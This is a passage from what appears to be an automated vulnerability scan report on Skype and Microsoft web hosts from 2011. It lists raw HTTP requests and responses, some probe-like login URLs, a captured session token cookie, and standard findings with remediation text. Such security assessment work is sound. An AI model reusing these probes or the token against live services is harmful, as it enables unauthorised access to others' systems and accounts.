Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170534:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; expires=Mon, 03-Sep-12 21:08:54 GMT; path=/; domain=.skype.com;
Location: http://www.skype.com/go/apps
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ui/0/5.5.0.115./en/go/prices HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: ui.skype.com
Cookie: skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; VISITORID=1344388383; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170817:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0
Response
HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 21:14:10 GMT
Server: Apache
Cache-control: no-cache, must revalidate
Pragma: no-cache
Expires: 0
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170850:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; expires=Mon, 03-Sep-12 21:14:10 GMT; path=/; domain=.skype.com;
Location: http://www.skype.com/go/prices
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ui/0/5.5.0.115./en/go/share HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: ui.skype.com
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170534:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; VISITORID=1344388383; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824
Response
HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 21:13:37 GMT
Server: Apache
Cache-control: no-cache, must revalidate
Pragma: no-cache
Expires: 0
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170817:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; expires=Mon, 03-Sep-12 21:13:37 GMT; path=/; domain=.skype.com;
Location: http://www.skype.com/go/share?SkypeName=&FriendEmailAddr_1=&FriendEmailAddr_2=&FriendEmailAddr_3=&FriendEmailAddr_4=&FriendEmailAddr_5=&FriendEmailAddr_6=&FriendName_1=&FriendName_2=&FriendName_3=&FriendName_4=&FriendName_5=&FriendName_6=
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ui/0/5.5.0.115./en/go/subscriptions?country= HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: ui.skype.com
Cookie: skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; VISITORID=1344388383; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170850:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0
Response
HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 21:27:02 GMT
Server: Apache
Cache-control: no-cache, must revalidate
Pragma: no-cache
Expires: 0
Set-Cookie: SC=CC=:CCY=:E70B9EF1770AF398=:LC=en-us:TM=1315171622:TS=1315171562:TZ=:VER=0/5.5.0.115/0; expires=Mon, 03-Sep-12 21:27:02 GMT; path=/; domain=.skype.com;
Location: http://www.skype.com/go/subscriptions?cm_mmc=Skype-_-Dynamic_Content-_-Subscriptions-_-Generic4
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ns/products/web-site-firewall-overview.php?&a=google-na_WebAppFirewallWW_WebApplicationSecurity&kw=web%20application%20security&gclid=CP2344L_g6sCFUsaQgodmjw72Q HTTP/1.1
Host: www.barracudanetworks.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pagead/aclk?sa=L&ai=Cr3NFq6RjTqDGGefoiAK0_eSmD8S6gssCrI_QwzuhzbWBDggAEAIoA1CF1JuQBGDJnv6GyKP8GqABvPiqzAPIAQGqBB9P0OACKPfGOZE474fyYYALAxyFDkPxCyIwI3XX4gluugUTCOjY8Pr-g6sCFfMrQgodiCMgqMoFAA&ei=qqRjTujbJPPXiAKIx4DBCg&ved=0CA0Q0Qw&val=ChAyNmVhN2ZlZjBhNmNmNDNiELDC9fIEGgjt108vSV8oOyABKAAw88uL57LFh-j1ATjy4fjyBECTyY7zBA&sig=AOD64_3dhBkP3lko1-av5PaHwMtErzeJiw&adurl=https://www14.software.ibm.com/webapp/iwm/web/signup.do%3Fsource%3Dswg-grd-q34Cyberthreats_web%26csr%3Dagust_itexpwebcast-20110816%26cm%3Dk%26cr%3Dgoogle%26ct%3D101CG4TW%26S_TACT%3D101CG4TW%26ck%3Dsecurity_in_web_application%26cmp%3D101CG%26mkwid%3Ds65PPPOzV_15893774852_432pjo10484 HTTP/1.1
Host: www.googleadservices.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1
Host: www.hl.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Houlihan Lo ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /us/ HTTP/1.1
Host: www.hlhz.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/ngsub1.gif HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: http://heartbeat.skype.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.newsgator.com
Proxy-Connection: Keep-Alive
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications that employ user credentials. If the function is enabled, credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
The form contains the following password field with autocomplete enabled:
PasswordTextBox
Request
GET /si/login.aspx/x22 HTTP/1.1 Host: mid.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 2491 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 Set-Cookie: lc=en-US; path=/ X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Sun, 04 Sep 2011 21:48:27 GMT Connection: close
The form contains the following password field with autocomplete enabled:
PasswordTextBox
Request
GET /si/login.aspx/x3c/cite/x3e/x3cspan HTTP/1.1 Host: mid.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 2560 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 Set-Cookie: lc=en-US; path=/ X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Sun, 04 Sep 2011 21:48:29 GMT Connection: close
Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.
Issue remediation
Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.
14. ASP.NET debugging enabled
There are 2 instances of this issue:
ASP.NET allows remote debugging of web applications, if configured to do so. By default, debugging is subject to access control and requires platform-level authentication.
If an attacker can successfully start a remote debugging session, this is likely to disclose sensitive information about the web application and supporting infrastructure which may be valuable in formulating targeted attacks against the system.
Issue remediation
To disable debugging, open the Web.config file for the application and find the <compilation> element within the <system.web> section. Set the debug attribute to "false". Note that it is also possible to enable debugging for all applications within the Machine.config file. You should confirm that the debug attribute in the <compilation> element has not been set to "true" within the Machine.config file as well.
It is strongly recommended that you refer to your platform's documentation relating to this issue, and do not rely solely on the above remediation.
ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.
The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.
Common explanations for Referer-dependent responses include:
Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.
Issue remediation
The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.
If the contents of responses are updated based on Referer data, then the same defences against malicious input should be employed here as for any other kind of user-supplied data.
The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /de/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:13 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 61616 Connection: close Content-Type: text/html; charset=UTF-8
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /developer/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:08 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 59562 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /developer/2011/03/longer_playtime_courtesy_of_si.html HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:11 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 60729 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /developer/2011/06/breaking_down_the_barriers_one.html HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:10 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 58059 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /developer/2011/06/bringing_video_to_the_next_wav.html HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:09 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 59244 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2005/05/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:03 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 230490 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2005/06/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:02 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 377860 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2005/07/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:43:00 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 594031 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2005/08/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:57 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 412787 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2005/09/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:56 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 362300 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2005/10/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:54 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 301665 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2005/11/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:52 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 342969 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2005/12/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:51 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 504735 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2006/01/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:48 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 341005 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2006/02/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:47 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 345891 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2006/03/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:45 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 403234 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2006/04/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:43 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 250170 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2006/05/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:41 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 790051 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2006/06/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:39 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 451171 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2006/07/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:37 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 338410 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2006/08/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:35 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 371498 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2006/09/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:33 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 248309 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2006/10/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:32 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 198595 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2006/11/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:30 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 351504 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2006/12/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:28 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 288676 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
GET /en/2007/01/ HTTP/1.1 Host: blogs.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 21:42:27 GMT Server: Apache/2.2.0 (Fedora) Content-Length: 242360 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:
email
uri
loc
Request
